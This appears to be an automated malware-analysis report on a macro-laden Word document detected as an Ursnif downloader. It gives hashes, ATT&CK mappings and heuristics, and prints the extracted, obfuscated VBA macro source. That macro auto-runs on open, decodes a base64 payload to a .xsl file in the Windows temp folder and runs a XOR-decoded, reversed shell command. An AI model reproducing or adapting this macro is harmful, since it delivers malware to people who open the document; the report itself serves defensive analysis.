Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 a692a67276b4185e…

MALICIOUS

Office (OOXML)

Size: 125.6 KB
Created: 2019-12-20 03:35:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-06-01
MD5: f71bff5a1b71cd26f561eb8eb7b2ce31
SHA-1: fbb882167519a5f157746b991d9ca4f779a1914c
SHA-256: a692a67276b4185e6270b575ac1ff0cebf60c90e8d5707f3f96c87703a1b50b9
Risk Score: 164

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

The file is an Office document containing a VBA macro with a Document_Open auto-execution routine. The macro appears to be obfuscated but contains logic to write a file to 'c:\windows\temp\aHx20.xsl' and likely executes it. This behavior is consistent with downloader or dropper malware.

Heuristics (6)

  • ClamAV: Doc.Downloader.UrsnifDE0-7640644-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.UrsnifDE0-7640644-0
  • VBA project inside OOXML medium (2 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/ — In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/ — In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4338 bytes
SHA-256: 99d508381f57886f81163aa0297c9ae11825da225de9fe90faead80f8e12f9ed
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub

Attribute VB_Name = "aJ9zf"
Public Const aEYRF5 As String = ""
Public Const a1m6y As String = "ndows\"
Public Const acwPUa As String = "\t"
Function aP1i5(abxBP, aM6W1)

Dim aPdSO
For aPdSO = 23 To 52
Debug.Print Error(aPdSO)
Next aPdSO
' Clarity za octavo
Dim a5zur7 As Integer
a5zur7 = 2763 + 2
' Sidon effectively nv
aEhM8B = ""
For aDWAZG = 0 To UBound(abxBP)
Dim atPZL
atPZL = 6389 * 1
' Witch xl caribou lisa gnat furnishings canes
aU1nb = abxBP(aDWAZG) Xor aM6W1
Dim arlXcB
arlXcB = 4590 * 2
' Groin wrench
aEhM8B = aEhM8B & Chr(aU1nb)
Next
aP1i5 = aEhM8B
End Function

Attribute VB_Name = "aFNBz"
Public Sub adOWsU()

Dim ai9oI
For ai9oI = 21 To 62
Debug.Print Error(ai9oI)
Next ai9oI
' Forswear baffle patient

Dim aN7TS
For aN7TS = 21 To 46
Debug.Print Error(aN7TS)
Next aN7TS
' Mw nails wheel
Dim a7IGKw As Long
a7IGKw = 24039 * 1
' Appliance
Dim aqLJaN
Dim adtZzL As Long
aqLJaN = 21
adtZzL = 10302 / 202
aEPl0 = aqLJaN + adtZzL
' Alice pollux ltd

Dim aujyGO As Integer
aujyGO = 8249 * 2

Dim a807Wt
Dim auay5 As Long
a807Wt = 51
auay5 = 6923 / 301
aHXoa = a807Wt / auay5
' Cove shelf
Set a2a3cB = ajfAv.str
aSvZG = a2a3cB.Value
Open "c:\wi" & a1m6y & acwPUa & "emp" & "\aHx20.xsl" For Output As #1
Print #1, awpaSO(aSvZG)
Close #1
End Sub
Sub aZGml(a9ZMR)

Dim aMnoA
For aMnoA = 29 To 39
Debug.Print Error(aMnoA)
Next aMnoA
' Marine urgency nouns
Dim abAcK As Integer
abAcK = 1412 + 20
Dim aa5EP As Long
Dim aXraRA
aa5EP = 74
aXraRA = 22
aavAL = aa5EP - aXraRA
' Miller limitations entrust cuss
Dim a9UvX As Long
Dim aEIAR As Integer
a9UvX = 9685 / 745
aEIAR = 24
aa0mzP = a9UvX / aEIAR
' Open-mouthed escort despotic louisville everybody

Dim acxGKL
For acxGKL = 3 To 63
Debug.Print Error(acxGKL)
Next acxGKL
' Blight write parable assistance
End Sub
Function awpaSO(aufNH)

Dim aZaGuv
For aZaGuv = 2 To 59
Debug.Print Error(aZaGuv)
Next aZaGuv
' Stephanie sameness


Dim aR0S7
For aR0S7 = 11 To 35
Debug.Print Error(aR0S7)
Next aR0S7
' Refer pastime
Set aoqNXk = New MSXML2.DOMDocument
Dim aiq48
aiq48 = 898 * 5
' Suites sheriff
Set aCzQXy = aoqNXk.createElement("b64")
aCzQXy.DataType = "bin.base64"

Dim aDdrKT
For aDdrKT = 23 To 34
Debug.Print Error(aDdrKT)
Next aDdrKT
' Largely invitation
aCzQXy.Text = aufNH
awpaSO = StrConv(aCzQXy.nodeTypedValue, vbUnicode)
Dim aUVqh As Long
Dim axuzhg
aUVqh = -50 + 170
axuzhg = 659 - 628
a4JKCe = aUVqh + axuzhg
End Function

Attribute VB_Name = "ax9Uqg"
Function aHDPYh()
Dim a0AWTV As Long
Dim aqzG6 As Long
a0AWTV = 13125 / 105
aqzG6 = 43
aHMAtC = a0AWTV * aqzG6
aHDPYh = Array(70, 8, 23, 28, 74, 84, 86, 28, 44, 5, 56, 20, 9, 1, 16, 56, 23, 19, 11, 0, 10, 13, 19, 56, 94, 7, 70, 94, 16, 5, 9, 22, 11, 2, 75, 68, 16, 23, 13, 8, 68, 23, 23, 1, 7, 11, 22, 20, 68, 7, 13, 9, 19, 68, 7, 75, 68, 0, 9, 7)
End Function
Sub main()

Dim aLlcD
For aLlcD = 25 To 36
Debug.Print Error(aLlcD)
Next aLlcD
' Databases prominence tight
Dim aWqSP As String
Dim auJNa0
Dim aTGu9Y As Long
auJNa0 = 115
aTGu9Y = 27324 / 2277
aNa6Bo = auJNa0 * aTGu9Y
' Evacuation mad
a3vXNh = 10700 / 107
aWqSP = aP1i5(aHDPYh, a3vXNh)

Dim aoy4Yv
For aoy4Yv = 18 To 47
Debug.Print Error(aoy4Yv)
Next aoy4Yv
' Constructed valentine sphere panties lat
Dim a9rCIB As Integer
Dim aP2BAs As Integer
a9rCIB = 123
aP2BAs = 600 - 550
aZh4q = a9rCIB / aP2BAs
' Insidious distance cisco vaunting assembling mammy


Dim a1ODw
For a1ODw = 16 To 35
Debug.Print Error(a1ODw)
Next a1ODw
' Warring rays beverage impassive
adOWsU
Call VBA.Interaction.Shell@(StrReverse(aWqSP))

End Sub

Attribute VB_Name = "ajfAv"
Attribute VB_Base = "0{A113BA0C-2379-48DC-AE41-50A0DE0A7798}{FE44848
... (truncated)
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 34816 bytes
SHA-256: a62b4dbf48b4fcdf3031238e38f26d22e0f86629600f1f187a52956433cf97d0
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).